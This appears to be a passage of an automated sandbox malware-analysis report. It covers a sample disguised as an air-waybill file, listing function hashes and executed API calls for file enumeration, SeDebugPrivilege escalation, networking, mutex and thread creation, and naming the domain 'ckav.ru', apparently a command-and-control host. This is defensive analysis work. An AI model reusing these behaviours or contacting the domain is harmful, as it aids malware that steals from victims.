Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b92b943c01b039657ef42ae144b0fa5030fdba71d66e93c1fad37e177b5b21c8
Instruction ID: c6dd1506eb3d0b398873715229203ad2f903c4f3a7782d052226eada8ac0f84a
Opcode Fuzzy Hash: b92b943c01b039657ef42ae144b0fa5030fdba71d66e93c1fad37e177b5b21c8
Instruction Fuzzy Hash: B0E1FAB4E002198FCB54DFA9D5809AEFBB2FF89304F248169E414AB356D774AE41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07C83140 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5e9156842d612088ea2d40fd575389fdce3849249588766369cd05458620b8
Instruction ID: 80534314130a344cba0f3a34456003b5a5ebcd9af3cf7cd47d81201bfc5efb1b
Opcode Fuzzy Hash: 2a5e9156842d612088ea2d40fd575389fdce3849249588766369cd05458620b8
Instruction Fuzzy Hash: 35E1FAB4E002598FCB54DFA9C5809AEFBB2FF89304F249169E415AB356D734AD42CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07C83578 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc2d57965075a0a66cb243ce2ba57c666fc482a743280f08a742319c6892fbd
Instruction ID: 7bfd46d72dc5862a2fcd9308735d960f3be667ae4838e3cdab5de7eb368e70d8
Opcode Fuzzy Hash: 7dc2d57965075a0a66cb243ce2ba57c666fc482a743280f08a742319c6892fbd
Instruction Fuzzy Hash: DDE1E9B4E002598FCB54DFA9C5809AEFBB2FF89304F249169E414AB356D735AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07C84C20 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6915f29dcae78e1f5438b969c935f027b42ce3d539b8b1f5476f2b5b9a7b7bcb
Instruction ID: c867ad0e86c825ab3e5bd7a0bd0c708a9d8fdb31ad99024dbb1ed9af40dbf8ea
Opcode Fuzzy Hash: 6915f29dcae78e1f5438b969c935f027b42ce3d539b8b1f5476f2b5b9a7b7bcb
Instruction Fuzzy Hash: 30E1FAB4E0125A8FCB54DFA9C5809AEFBB2FF89304F248169E414AB355D735AE41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07C9F148 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ccf7b4de5a49bfa55620a424bd8290c667ea4e640b270ea72b64895ef6a4c4a
Instruction ID: 6e95ff415ad02892bb7a9fdcbdcd8cafe054881ee3dab45e48c9eed0bcafc15f
Opcode Fuzzy Hash: 5ccf7b4de5a49bfa55620a424bd8290c667ea4e640b270ea72b64895ef6a4c4a
Instruction Fuzzy Hash: 36D1D73592075ACACB10EF64D990AADF771FF95300F50C7AAE10977224EB74AAC9CB40

Uniqueness

Uniqueness Score: -1.00%

Function 055A01A0 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b34ea29933c8bcfb3bef76f596b2b72dcba80ac57ee5c754b207012eee56219b
Instruction ID: 3e5df4488b4dfc6fb7d0e806581f98494eaa476e4355901ee195b39377df77f5
Opcode Fuzzy Hash: b34ea29933c8bcfb3bef76f596b2b72dcba80ac57ee5c754b207012eee56219b
Instruction Fuzzy Hash: 8FA17D32E10209CFCF15DFB5C8945AEB7B2FF85300B15856AE906AB2A1EB31E955CF40

Uniqueness

Uniqueness Score: -1.00%

Function 055A0B50 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 594f053e356d6f66ac05edb6bc62f78d106fa8e814b685b322f7a975f46c9c70
Instruction ID: d609f472b3d45283b12201beef582b2b31dd30de2cc44efbe2132016f4d0636c
Opcode Fuzzy Hash: 594f053e356d6f66ac05edb6bc62f78d106fa8e814b685b322f7a975f46c9c70
Instruction Fuzzy Hash: 7DC12AB0DC0745CAD712DF66E94818B3BB2BB86315FE04B19D2616B2E0DBB414EACF44

Uniqueness

Uniqueness Score: -1.00%

Function 07C9AA60 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74d0ebc159cce38c52eae47fd68678eac2d238f7a72eb858af49dd083ac9ff82
Instruction ID: 11447ecefe42d19f4570ca9927c9ee3b3cc68800c59e4cc1c341559bd737ea53
Opcode Fuzzy Hash: 74d0ebc159cce38c52eae47fd68678eac2d238f7a72eb858af49dd083ac9ff82
Instruction Fuzzy Hash: F481B1B4E14219CFCB44CFAAC58499EFBF2FF89210F14956AD415AB320D734AA42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 07C98770 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 626dea25b58d46088dea87978d9a7b9d37b2996c1ebb2dc9ef4ce6c9d8795bdd
Instruction ID: 3e0baf81bbb43da1c1ae1f62f8d31661c7710f112104752905dfe26965fab2e7
Opcode Fuzzy Hash: 626dea25b58d46088dea87978d9a7b9d37b2996c1ebb2dc9ef4ce6c9d8795bdd
Instruction Fuzzy Hash: 947128B5E1120ADBCB44CF9AD4849EEFBF2FB89310F148425E415AB354C3349A81CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07C9BED0 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed77da2911a2944074ac44efbf23dbdac7a3e59d4403febb560b6391b7d3d276
Instruction ID: 1c5db7fc077754c2c6c9a9af2a556dbf327368e172b8164b882de6c0246f47d4
Opcode Fuzzy Hash: ed77da2911a2944074ac44efbf23dbdac7a3e59d4403febb560b6391b7d3d276
Instruction Fuzzy Hash: A7619AB0935A0DEBCB44CFA5F18A66DBFB2FB89310F2094A5D08597194DB348665CB14

Uniqueness

Uniqueness Score: -1.00%

Function 07C9B918 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c65f70c575ca8953f9e369193fc86e0fdca40c7aa13d2299538651d3c0243f9
Instruction ID: 72d828f03214c63dae00220eacd5ad3cc4b9c880d10e21b413455d2e0f26de68
Opcode Fuzzy Hash: 0c65f70c575ca8953f9e369193fc86e0fdca40c7aa13d2299538651d3c0243f9
Instruction Fuzzy Hash: 416103B0E1120AEBCF44CFAAD5855EEFBB2FF89200F14806AD415B7214D734AA418F95

Uniqueness

Uniqueness Score: -1.00%

Function 07C9D8A8 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff8516a3959350db8825e5515dd95c70142aee1412c1bbc9fd5add2e9052339
Instruction ID: 9a48bbb8c0e00419db622bad9427aa8d4cdf7f79efb3410eb4764c58421d62e0
Opcode Fuzzy Hash: 4ff8516a3959350db8825e5515dd95c70142aee1412c1bbc9fd5add2e9052339
Instruction Fuzzy Hash: 24513BB0E1520ACBCF44DFAAD4855AEFBF2BF89310F10942AE416B7354DB345A428F94

Uniqueness

Uniqueness Score: -1.00%

Function 07C90006 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 186e0eaa188ab79c202f8c971b75e68df5d3caac87f5626c245f59fe59b5f0b4
Instruction ID: 48373167db4d7f8c734828974b83a0db1ce85a5327bbd264dbc7500309f0dcc5
Opcode Fuzzy Hash: 186e0eaa188ab79c202f8c971b75e68df5d3caac87f5626c245f59fe59b5f0b4
Instruction Fuzzy Hash: AE4183B1D056588FEB5DCF6B8C512CAFBF3AFC5210F08C1BAC418AB255DA3509468F55

Uniqueness

Uniqueness Score: -1.00%

Function 07C90040 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74fb58e7dc8c68c7f57698134fea2df0ee1da703286c6f6b51a65dc6e07de818
Instruction ID: c7c36ce7fca6ede865694a7354bdb58d1d5f6c6532707e9fcf15d5b2c26a2186
Opcode Fuzzy Hash: 74fb58e7dc8c68c7f57698134fea2df0ee1da703286c6f6b51a65dc6e07de818
Instruction Fuzzy Hash: BD415FB1D016198BEB5CCF6B8D4469EFBF3AFC9301F18C1BA941CAA254EB3405968F54

Uniqueness

Uniqueness Score: -1.00%

Function 07C9BC88 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fefeacb8d0db2613f745156fe6822224b9d14d2e32f7650c25f869a33278ac9a
Instruction ID: 56eecdd505a5bfcaa725f4e3256f7cf1344663f3756b3a183779faa1032d8b37
Opcode Fuzzy Hash: fefeacb8d0db2613f745156fe6822224b9d14d2e32f7650c25f869a33278ac9a
Instruction Fuzzy Hash: 5C41D2B1E0020AEBDF48CFAAD4855AEFBF2BF89300F24D12AD415A7214D7349A51CF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exePID: 6536, Parent PID: 5516COMMON

Execution Graph

Execution Coverage:	31.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Windows, xrefs: 00403DEA
Program Files, xrefs: 00403E01
%s\*, xrefs: 00403D99
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
